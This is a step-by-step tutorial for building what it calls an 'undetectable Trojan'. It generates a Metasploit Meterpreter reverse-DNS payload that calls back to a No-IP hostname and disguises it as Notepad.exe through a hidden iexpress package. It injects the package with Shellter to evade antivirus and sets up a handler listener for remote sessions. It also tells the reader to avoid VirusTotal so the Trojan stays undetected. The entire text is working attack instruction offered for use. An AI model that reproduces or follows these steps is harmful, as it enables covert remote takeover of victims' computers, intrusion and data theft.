Things You Will Need:
- Kali Linux
- A No IP account with a domain name
- A forwarded port on your router
Part 1: Creating the DNS PayloadUsing Kali:
- Open Metasploit on Kali by typing msfconsole in a terminal.
- Type use payload/windows/meterpreter/reverse_tcp_dns.
- Type show options. This will show you that you need to set your lhost and lport.
- Type set lhost (hostname you created, without http://).
- Type set lport (port you have forwarded on your router set for the Kali machine).
- Type generate -h. This will show you the options for generating the payload. You can choose different options but at least do the following.
- Type generate -f (file name you choose for the payload) -p windows -t raw. Ex. generate -f DNS -p windows -t raw
- Exit the terminal and click on Files. Your payload will be in your Home (Unless you set an option for a different location).
- Transfer the created payload to Windows. (Be aware that your AV might detect it at its current state).
Part 2: Creating the Executable File in Windows
- Choose option that applies to you. (Important as Shellter does not work with 64-bit executables).
- 32-bit Windows - Navigate to C:\Windows\System32\iexpress.exe (Right click and select run as administrator)
- 64-bit Windows - Navigate to C:\Windows\SysWOW64\iexpress.exe (Right click and select run as administrator)
- Choose Create new Self Extraction Directive File and click next.
- Click next on the Package Purpose page.
- Type the title of the package. (This can be anything you want) Ex: Notepad.exe
- No Prompt, click next.
- Do not display a license. Click next.
- Click Add and choose any file on your computer. I choose Notepad.exe in the C:\Windows\System32 folder. Click Next.
- Click the drop arrow and choose the file name you choose on the last screen. Click Next.
- Choose Hidden and then click next.
- No Message. Click Next
- Click Browse and type a name for your malware file and a destination. Check the Hide File Extracting Progress Animation from user. Click Next.
- Select No restart and then click next.
- You can then either choose to save the self extraction directive or don't save. Click Next.
- Click Next again on the create Package. Then click Finish.
Part 3: Using Both Created Files in Shellter to Create Your Trojan
- Open the folder that Shellter is in. Right click on Shellter.exe and click Run as Administrator.
- Type A for Auto.
- Type N for No.
- Type the location of your created EXE file from Part 2 and hit enter. Let Shellter do it's thing for 30 seconds to a minute.
- When asked to choose payload, type C for custom.
- Type the location of your created payload in Part 1 and hit enter.
- Type N for No reflective DLL loader.
- Hit enter and let Shellter finish doing it's thing If it says Injection Verified! you should have a working undetectable Trojan.
- Hit enter to exit Shellter.
Part 4: Set Up Your ListenerYou can either use Metasploit or Armitage. I prefer Armitage so my tutorial will be for that.
- Go back to Kali.
- Open Terminal and type Msfupdate
- Once it's done type apt-get install armitage.
- Type msfdb init
- Open Armitage
- Click Connect
- Click Yes
- Once Armitage opens type: use exploit/multi/handler
- Type set lhost 0.0.0.0
- Type set lport (your port you forwarded in your router)
- Type set payload windows/meterpreter/reverse tcp dns
- Type set exitonsession false
- (Optional.) Type set autorunscript migrate -f
- (Optional.) Type set prependmigrate True
- Type exploit -j
Now you should be able to run your undetectable Trojan and get a Meterpreter session.
DO NOT Upload your created Executable to online sites such as Virus Total.